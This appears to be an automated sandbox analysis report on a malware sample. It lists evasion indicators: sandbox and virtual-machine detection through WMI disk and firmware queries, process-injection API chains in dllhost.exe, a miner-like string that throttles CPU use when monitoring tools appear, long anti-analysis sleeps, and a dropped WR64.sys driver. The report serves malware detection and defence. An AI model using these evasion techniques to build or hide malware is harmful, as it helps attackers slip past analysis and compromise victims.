Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Contains functionality to compare user and computer (likely to detect sandboxes)
Source: C:\Windows\System32\dllhost.exe Code function: OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle, 94_2_0000000140001868
Source: C:\Windows\System32\dllhost.exe Code function: OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle, 95_2_0000000140001868
Source: C:\Windows\System32\dllhost.exe Code function: OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle, 97_2_0000000140001868
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Query firmware table information (likely to detect VMs)
Source: C:\Windows\System32\svchost.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Windows\explorer.exe System information queried: FirmwareTableInformation
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: conhost.exe, 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1503362780.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1516296200.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1491167267.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1504370851.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1485004069.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1493388447.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1515362432.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1500353828.0000012BFEB1F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1489451873.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1507696835.0000012BFEB1D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [0M%S STOPPING IDLE, SETTING MAX CPU TO: %D%S STARTING IDLE, SETTING MAX CPU TO: %DTASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE%S
Source: conhost.exe, 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1503362780.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1516296200.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1491167267.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1504370851.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1485004069.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1493388447.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1515362432.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1500353828.0000012BFEB1F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1489451873.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1507696835.0000012BFEB1D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Memory allocated: 1140000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Memory allocated: 1B260000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\conhost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6336
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3481
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2757
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7107
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2089
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8131
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1347
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8472
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 469
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8845
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 561
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8877
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 498
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8547
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1003
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5442
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6183
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1570
Found dropped PE file which has not been started or loaded
Source: C:\Windows\System32\conhost.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys Jump to dropped file
Found evasive API chain (may stop execution after accessing registry keys)
Source: C:\Windows\System32\dllhost.exe Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess
Source: C:\Windows\System32\dllhost.exe Evasive API call chain: RegQueryValue,DecisionNodes,ExitProcess
Found evasive API chain checking for process token information
Source: C:\Windows\System32\dllhost.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\e7WMhx18XN.exe TID: 7836 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 5808 Thread sleep count: 144 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7064 Thread sleep count: 6336 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7064 Thread sleep count: 3481 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3408 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3952 Thread sleep count: 2757 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2712 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3964 Thread sleep count: 175 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5256 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5084 Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7348 Thread sleep count: 8131 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7384 Thread sleep count: 1347 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1008 Thread sleep time: -13835058055282155s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7472 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7376 Thread sleep count: 8472 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7376 Thread sleep count: 469 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1100 Thread sleep time: -12912720851596678s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6200 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7456 Thread sleep count: 8845 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2956 Thread sleep count: 561 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4484 Thread sleep time: -14757395258967632s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4100 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7476 Thread sleep count: 8877 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7524 Thread sleep count: 498 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5172 Thread sleep time: -14757395258967632s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3504 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6392 Thread sleep count: 8547 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2900 Thread sleep count: 1003 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1992 Thread sleep count: 35 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3600 Thread sleep time: -11990383647911201s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3152 Thread sleep count: 5442 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1184 Thread sleep count: 107 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5500 Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6220 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 504 Thread sleep count: 6183 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 504 Thread sleep count: 1570 > 30
